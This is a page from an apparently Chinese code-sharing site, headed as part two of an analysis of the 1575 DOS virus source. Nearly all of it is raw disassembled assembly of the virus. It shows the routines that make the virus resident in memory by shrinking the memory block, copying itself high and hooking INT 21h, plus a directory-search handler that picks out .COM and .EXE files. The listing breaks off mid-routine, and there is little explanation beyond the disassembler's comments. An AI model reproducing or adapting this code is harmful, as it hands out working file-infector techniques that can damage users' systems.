📄 1575病毒源程序分析(2) .txt
字号:
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_6 proc near
push ax
push es
push ds
xor ax,ax ; Zero register
mov es,ax
mov si,86h
mov ax,es:[si]
mov ds,ax
mov si,725h
cmp word ptr [si],0A0Ch
jne loc_14 ; Jump if not equal
push ds
pop ax
call sub_13 ; (0611)
pop ds
pop es
pop ax
retn
loc_14:
push cs
pop ds
mov ax,data_31
dec ax
mov es,ax
cmp byte ptr es:[0],5Ah ; 'Z'
je loc_15 ; Jump if equal
jmp short loc_16 ; (04B4)
db 90h
loc_15:
mov ax,es:data_9e
mov cx,737h
shr cx,1 ; Shift w/zeros fill
shr cx,1 ; Shift w/zeros fill
shr cx,1 ; Shift w/zeros fill
shr cx,1 ; Shift w/zeros fill
sub ax,cx
jc loc_16 ; Jump if carry Set
mov es:data_9e,ax
sub es:data_10e,cx
push cs
pop ds
mov ax,es:data_10e
push ax
pop es
mov si,100h
push si
pop di
mov cx,627h
cld ; Clear direction
repne movsb ; Rep while cx>0 Mov [si] to es:[di]
push es
sub ax,ax
mov es,ax
mov si,84h
mov dx,4A8h
mov es:[si],dx
inc si
inc si
pop ax
mov es:[si],ax
loc_16:
pop ds
pop es
pop ax
retn
sub_6 endp
db 3Ch, 57h, 75h, 3, 0EBh, 1Eh
db 90h, 80h, 0FCh, 1Ah, 75h, 6
db 0E8h, 17h, 1, 0EBh, 13h, 90h
loc_17:
cmp ah,11h
jne loc_18 ; Jump if not equal
call sub_7 ; (04E1)
iret ; Interrupt return
loc_18:
cmp ah,12h
jne loc_19 ; Jump if not equal
call sub_10 ; (059C)
iret ; Interrupt return
loc_19:
jmp dword ptr cs:data_11
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_7 proc near
mov al,57h ; 'W'
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds
push cs
pop es
mov byte ptr cs:data_35,0
nop
call sub_8 ; (0514)
jnz loc_20 ; Jump if not zero
call sub_2 ; (023D)
jz loc_20 ; Jump if zero
call sub_15 ; (065A)
dec byte ptr ds:data_6e
loc_20:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
sub_7 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_8 proc near
push cs
pop es
push cs
pop es
cld ; Clear direction
call sub_9 ; (0552)
jnc loc_21 ; Jump if carry=0
cmp di,0
retn
loc_21:
mov di,219h
mov al,2Eh ; '.'
mov cx,0Bh
repne scasb ; Rept zf=0+cx>0 Scan es:[di] for al
cmp word ptr [di],4F43h
jne loc_22 ; Jump if not equal
cmp byte ptr [di+2],4Dh ; 'M'
jne loc_22 ; Jump if not equal
mov byte ptr ds:[724h],43h ; 'C'
nop
retn
loc_22:
cmp word ptr [di],5845h
jne loc_ret_23 ; Jump if not equal
cmp byte ptr [di+2],45h ; 'E'
jne loc_ret_23 ; Jump if not equal
mov byte ptr ds:[724h],45h ; 'E'
nop
loc_ret_23:
retn
sub_8 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_9 proc near
loc_24:
push ds
mov si,cs:data_27
mov ax,cs:data_28
mov ds,ax
mov di,219h
lodsb ; String [si] to al
cmp al,0FFh
jne loc_25 ; Jump if not equal
add si,6
lodsb ; String [si] to al
jmp short loc_26 ; (0574)
db 90h
loc_25:
cmp al,5
jb loc_26 ; Jump if below
pop ds
stc ; Set carry flag
retn
loc_26:
mov cx,0Bh
cmp al,0
je locloop_27 ; Jump if equal
add al,40h ; '@'
stosb ; Store al to es:[di]
mov al,3Ah ; ':'
stosb ; Store al to es:[di]
locloop_27:
lodsb ; String [si] to al
cmp al,20h ; ' '
je loc_28 ; Jump if equal
stosb ; Store al to es:[di]
jmp short loc_29 ; (0594)
db 90h
loc_28:
cmp byte ptr es:[di-1],2Eh ; '.'
je loc_29 ; Jump if equal
mov al,2Eh ; '.'
stosb ; Store al to es:[di]
loc_29:
loop locloop_27 ; Loop if cx > 0
mov al,0
stosb ; Store al to es:[di]
pop ds
clc ; Clear carry flag
retn
sub_9 endp
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; SUBROUTINE
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
sub_10 proc near
mov al,57h ; 'W'
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds
push cs
pop es
cmp byte ptr cs:data_35,0
je loc_30 ; Jump if equal
jmp short loc_31 ; (05D3)
db 90h
loc_30:
call sub_8 ; (0514)
jnz loc_31 ; Jump if not zero
call sub_2 ; (023D)
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -